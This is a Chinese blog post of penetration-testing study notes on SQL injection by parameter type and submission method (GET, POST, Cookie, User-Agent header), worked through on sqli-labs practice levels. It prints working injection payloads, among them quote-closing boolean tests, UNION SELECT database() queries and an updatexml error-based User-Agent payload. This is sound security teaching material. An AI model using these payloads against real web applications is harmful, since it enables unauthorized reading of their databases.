小迪渗透测试学习笔记(十四)WEB漏洞-SQL注入之类型及提交注入

最新推荐文章于 2024-07-24 19:42:49 发布
最新推荐文章于 2024-07-24 19:42:49 发布
阅读量373 收藏 2
点赞数
分类专栏: 安全 渗透 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42591058/article/details/122114822
版权

在真实SQL注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型和提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入。

在这里插入图片描述

#简要明确参数类型:数字,字符,搜索,JSON等

#简要明确请求方法:GET,POST,COOKIE,REQUEST,HTTP头等

SQL语句干扰符号:’, ", %, ), } 等,具体需看写法

案例

1. 参数字符型注入测试(sqlilabs less-5)

第5关属于报错注入,这里只看属于什么类型,不进行实际注入测试。

  1. 源代码输出sql语句,便于查看。
  2. 输入id=1,看sql语句,发现id用单引号 ’ 闭合了,属于字符型注入。
    在这里插入图片描述
  3. 按数字型输入测试,没用
http://192.168.187.142/sqlilabs/Less-5/?id=1%20and%201=2

在这里插入图片描述
4. 将单引号闭合,测试

http://192.168.187.142/sqlilabs/Less-5/?id=1%27%20and%20%271%27=%271

在这里插入图片描述

http://192.168.187.142/sqlilabs/Less-5/?id=1%27%20and%20%271%27=%272

在这里插入图片描述

第5关属于单引号闭合,还有双引号闭合,小括号闭合,以及它们的组合等。

POST数据提交注入测试(sqlilabs less-11)

  1. 源代码输出sql语句,便于查看。
  2. 正确提交用户名密码,可以看到是单引号闭合。
    在这里插入图片描述
  3. 利用 order by 爆出列数
admin' order by 3 #
admin' order by 2 #
  1. 查看每个字段在哪里显示
asdf' union select 1,2 #

在这里插入图片描述
5. 查数据库

asdf' union select database(),2 #

在这里插入图片描述

参数JSON数据注入测试

注入方式一样,格式更改。

COOKIE数据提交注入测试(sqlilabs less-20)

  1. 尝试 admin admin 正常登录
    在这里插入图片描述

  2. 抓包分析,发现Cookie中存在uname
    在这里插入图片描述
    在这里插入图片描述

  3. 发送到repeater,爆出列数,发现为3列
    在这里插入图片描述
    在这里插入图片描述

  4. 查看每个字段的位置
    在这里插入图片描述

  5. 在2的位置上查数据库
    在这里插入图片描述

HTTP头部参数数据注入测试(sqlilabs less-18)

  1. 正常登录
    在这里插入图片描述

  2. 抓包分析,发送到repeater,修改 User-Agent
    在这里插入图片描述

  3. 修改 User-Agent , 爆出数据库名

 'or  updatexml(1,concat(0x7e,database(), 0x7e),0) or '

在这里插入图片描述

萧丶RY
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年05月 Web渗透测试SQL注入sqli-labs、Less-18-22)
时光隧道
07-19 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。user-agent型注入点是指黑客使用伪造的user-agent字符串来对服务器进行攻击,希望服务器无法正确识别客户端,从而达到攻击目的的一种注入点。
漏洞复现】泛微E-Mobile 6.0 messageType.do存在命令执行漏洞
qq_34780861的博客
04-15 642
泛微E-Mobile 6.0爆出存在命令执行漏洞的问题。攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
mysqlsql手工注入基于回显,【靶场实战】入坑必须看的SQL注入部分解题指南
weixin_29479561的博客
03-18 669
原标题:【靶场实战】入坑必须看的SQL注入部分解题指南基于回显的手工注入基本思路WAF视角关键点需要支持and关键字本节内容依赖数据库的写作方式如下,用户可控id。▼「写作方式」$sql = "select id, info from sqlinj where id=$id";判断是否存在注入点判断 column的 数量。 select * from stub_table order by 1确定...
Bypass学习
weixin_44508748的博客
09-10 2198
一、网站防护分类 - 源码防护: 使用过滤函数对恶意攻击进行过滤,绕过思路: ①大小写替换 ②变换提交方式:如get请求变post/cookie请求绕过 ③编码绕过:url编码、基于语句重叠、注释符等 - 软件WAF: 通过访问速度、指纹识别等特征进行拦截;常见软件WAF如安全狗、D盾、云锁、云盾等,软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击,进行IP封锁; - 硬件WAF: 主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于TCP三次握手封锁真实
SQL注入之字符型注入练习(pikachu)
windStudyer的专栏
04-17 3739
SQL注入之字符型 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符型注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类型 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类型 从上可以看出,请求的方法为get类型注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符型。 判断注入点 从2.1知道请求方法和注入类型,因为是字符..
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
它包含了SQL注入、跨站脚本(XSS)、盲注等漏洞类型。在Linux系统上,可以通过`yum install`快速搭建LAMP环境,安装Apache(httpd)、MySQL Server、MySQL客户端、PHP以及PHP的GD库,为部署DVWA做好准备。 **实战...
web渗透测试笔记.txt
05-11
1、渗透测试框架与流程 2、网络漏洞扫描 3、web漏洞扫描 4、文件上传漏洞 5、文件包含漏洞 7、xss和sql注入 8、php代码注入和os命令注入
读书笔记之python渗透测试.docx
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
网络安全-渗透完整笔记
03-27
Sqlmap是一款强大的SQL注入自动化工具,用于测试数据库安全。在渗透过程中,可能会遇到需要溯源的情况,这时会用到如the-backdoor-factory等工具来创建后门。此外,msfvenom是Metasploit框架中用于生成各种类型...
一次WEB服务器渗透测试笔记
12-28
### 渗透测试知识点解析:一次WEB服务器渗透测试笔记 #### 一、渗透测试概述 渗透测试,简称“渗透”或“pentest”,是一种模拟黑客攻击的行为,旨在评估计算机网络、应用程序、操作系统或设备的安全性。它通过...
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 352
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 215
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
core815的专栏
07-24 312
SQLynx数据库管理工具
SQL进阶技巧:如何使用差值累计计算思想巧解数学中递归计算问题
石榴姐yyds
07-23 506
本文给出了一种利用SQL语言如何解决数学上递归问题。解决问题的核心在于对差值累计计算的认识,差值累计计算的本质也就是数学中的迭代计算思想在SQL语言中的体现。本文中所描述的问题需要将上一行的计算结果拿出来放到下一行继续叠加,按照直观的思路需要用lag函数去取上一行值但是lag函数获取的往往都是明确的结果值,而这种需要动态计算,于是会走到递归计算的误区中,而需求中所描述的计算方式就是递归的思路,容易产生误解,但仔细推导我们不难发现其实就是每行按照固定的公式算出差值的累加,即 字段X的累计值减去字段Y的累计值等
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 445
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1274
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
使用sqlalchemy查询mysql的JSON字段
ithongchou的博客
07-23 157
首先,你需要定义一个与表格对应的模型类。
Qt基础 | QSqlTableModel 的使用
最新发布
zwcslj的博客
07-24 817
Q_OBJECTprivate://数据库连接//数据模型//选择模型//数据映射//自定义数据代理,性别//自定义数据代理,部门//打开数据表//获取字段名称,填充“排序字段”的comboBoxpublic:// QTableView的SelectionModel的行发生了变化,进行处理private::用于加载数据库驱动和建立与数据库之间的连接:用于指定某个数据表 ,作为数据表的数据模型。
Python实现Java mybatis-plus 产生的SQL自动化测试SQL速度和判断SQL是否走索引
weixin_46294086的博客
07-23 965
编程精选网(www.codehuber.com),程序员的终身学习网站已上线!后端技术】、【前端领域】感兴趣的小可爱,也欢迎关注❤️❤️❤️ 【JavaGPT】❤️❤️❤️,我将会给你带来巨大的【收获与惊喜】💝💝💝!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值